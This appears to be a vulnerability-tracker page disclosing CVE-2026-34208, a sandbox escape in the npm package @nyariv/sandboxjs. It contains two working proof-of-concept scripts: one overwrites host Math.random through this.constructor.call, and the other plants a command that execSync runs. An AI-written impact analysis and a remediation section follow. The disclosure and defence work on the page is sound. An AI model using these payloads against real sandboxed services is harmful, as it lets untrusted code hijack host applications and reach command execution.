Node.js CVE-2026-34208
CRITICALSeverity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
Lifecycle Timeline
3Blast Radius
ecosystem impact- 16 npm packages depend on @nyariv/sandboxjs (6 direct, 10 indirect)
Ecosystem-wide dependent count for version 0.8.36.
DescriptionGitHub Advisory
Summary
SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process.
Details
The intended safety model relies on write-time checks in assignment operations. In assignCheck, writes are denied when the destination is marked global (obj.isGlobal), which correctly blocks straightforward payloads like Math.random = () => 1.
Reference: src/executor.ts#L215-L218
if (obj.isGlobal) {
throw new SandboxAccessError(
`Cannot ${op} property '${obj.prop.toString()}' of a global object`,
);
}The bypass works because the dangerous write is not performed by an assignment opcode. Instead, attacker code reaches a host callable that performs writes internally. The constructor used for sandbox global objects is SandboxGlobal, implemented as a function that copies all keys from a provided object into this.
Reference: src/utils.ts#L84-L88
export const SandboxGlobal = function SandboxGlobal(this: ISandboxGlobal, globals: IGlobals) {
for (const i in globals) {
this[i] = globals[i];
}
} as any as SandboxGlobalConstructor;At runtime, global scope this is a SandboxGlobal instance (functionThis), so this.constructor resolves to SandboxGlobal. That constructor is reachable from sandbox code, and calls through Function.prototype.call are allowed by the generic call opcode path.
References:
const sandboxGlobal = new SandboxGlobal(options.globals);
...
globalScope: new Scope(null, options.globals, sandboxGlobal),const evl = context.evals.get(obj.context[obj.prop] as any);
let ret = evl ? evl(obj.context[obj.prop], ...vals) : (obj.context[obj.prop](...vals) as unknown);This creates a privilege gap:
- Direct global mutation is blocked in assignment logic.
- A callable host function that performs arbitrary property writes is still reachable.
- The call path does not enforce equivalent global-mutation restrictions.
- Attacker-controlled code can choose the write target (
Math,JSON, etc.) via.call(target, payloadObject).
In practice, the payload:
const SG = this.constructor;
SG.call(Math, { random: () => 'pwned' });overwrites host Math.random successfully. The mutation is visible immediately in host runtime and in fresh sandbox instances, proving cross-context persistence and sandbox boundary break.
PoC
Install dependency:
npm i @nyariv/sandboxjs@0.8.35Global write bypass with pwned marker
#!/usr/bin/env node
'use strict';
const Sandbox = require('@nyariv/sandboxjs').default;
const run = (code) => new Sandbox().compile(code)().run();
const original = Math.random;
try {
try {
run('Math.random = () => 1');
console.log('Without bypass (direct assignment): unexpectedly succeeded');
} catch (err) {
console.log('Without bypass (direct assignment): blocked ->', err.message);
}
run(`this.constructor.call(Math, { random: () => 'pwned' })`);
console.log('With bypass (host Math.random()):', Math.random());
console.log('With bypass (fresh sandbox Math.random()):', run('return Math.random()'));
} finally {
Math.random = original;
}Expected output:
Without bypass (direct assignment): blocked -> Cannot assign property 'random' of a global object
With bypass (host Math.random()): pwned
With bypass (fresh sandbox Math.random()): pwnedWith bypass (host Math.random()) proves the sandbox changed host runtime state immediately. With bypass (fresh sandbox Math.random()) proves the mutation persists across new sandbox instances, which shows cross-execution contamination.
Command id execution via host gadget
This second PoC demonstrates exploitability when host code later uses a mutated global property in a sensitive sink. It uses the POSIX id command as a harmless execution marker.
#!/usr/bin/env node
'use strict';
const Sandbox = require('@nyariv/sandboxjs').default;
const { execSync } = require('child_process');
const run = (code) => new Sandbox().compile(code)().run();
const hadCmd = Object.prototype.hasOwnProperty.call(Math, 'cmd');
const originalCmd = Math.cmd;
try {
try {
run(`Math.cmd = 'id'`);
console.log('Without bypass (direct assignment): unexpectedly succeeded');
} catch (err) {
console.log('Without bypass (direct assignment): blocked ->', err.message);
}
run(`this.constructor.call(Math, { cmd: 'id' })`);
console.log('With bypass (host command source Math.cmd):', Math.cmd);
console.log(
'With bypass + host gadget execSync(Math.cmd):',
execSync(Math.cmd, { encoding: 'utf8' }).trim(),
);
} finally {
if (hadCmd) {
Math.cmd = originalCmd;
} else {
delete Math.cmd;
}
}Expected output:
Without bypass (direct assignment): blocked -> Cannot assign property 'cmd' of a global object
With bypass (host command source Math.cmd): id
With bypass + host gadget execSync(Math.cmd): uid=1000(mk0) gid=1000(mk0) groups=1000(mk0),...Impact
This is a sandbox integrity escape. Untrusted code can mutate host shared global objects despite explicit global-write protections. Because these mutations persist process-wide, exploitation can poison behavior for other requests, tenants, or subsequent sandbox runs. Depending on host application usage of mutated built-ins, this can be chained into broader compromise, including control-flow hijack in application logic that assumes trusted built-in behavior.
AnalysisAI
Sandbox escape in SandboxJS npm package allows unauthenticated remote attackers to mutate host JavaScript global objects (Math, JSON, etc.) and persist malicious code across sandbox instances. The vulnerability bypasses intended global-write protections by exploiting an exposed constructor callable path (this.constructor.call), enabling arbitrary property injection into host runtime globals. Exploitation probability is HIGH (EPSS not available for recent CVE), with publicly available exploit code demonstrating both immediate host contamination and cross-execution persistence. Critical impact: attacker-controlled globals can hijack application control flow when host code consumes mutated built-ins, escalating to arbitrary command execution when chained with application sinks like execSync().
Technical ContextAI
SandboxJS is a Node.js JavaScript sandbox library (npm package @nyariv/sandboxjs) designed to execute untrusted code with restricted access to host runtime. The vulnerability stems from an architectural gap between two protection layers: assignment-time checks (assignCheck) that block direct writes like 'Math.random = value', and callable host functions that perform writes internally. The root cause (CWE-693: Protection Mechanism Failure) lies in the SandboxGlobal constructor implementation, which copies all properties from a provided object into 'this' without validating whether 'this' points to a protected global context. Because sandbox code runs with 'this' bound to a SandboxGlobal instance and Function.prototype.call is permitted, attackers can redirect the constructor's write target to any host global object. The call path (executor.ts line 493-518) allows Function.prototype.call invocations without enforcing the same global-mutation restrictions applied to assignment opcodes, creating exploitable privilege escalation within the sandbox's trust boundary.
RemediationAI
Immediately upgrade to a patched version of @nyariv/sandboxjs when released by the vendor. Monitor the GitHub security advisory at https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj for patch availability notifications-no vendor-released patch version is independently confirmed at time of analysis, though upstream fix development is likely in progress given public disclosure. As interim mitigation, implement defense-in-depth controls: (1) run SandboxJS instances in isolated processes with restricted privileges rather than in-process sandboxing, (2) validate and sanitize all inputs before sandbox execution, (3) implement object-freeze protections on critical host globals before initializing sandboxes (Object.freeze(Math), Object.freeze(JSON), etc.), though this may break legitimate sandbox functionality, (4) deploy runtime monitoring to detect unexpected mutations to built-in prototypes and global objects, (5) consider alternative sandboxing solutions with stronger isolation guarantees (vm2 with updated patches, isolated-vm, or OS-level containers) until vendor patch is available. For applications unable to migrate immediately, restrict SandboxJS usage to trusted code paths only and reject all untrusted user-supplied scripts.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-693 – Protection Mechanism Failure
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-2gg9-6p7w-6cpj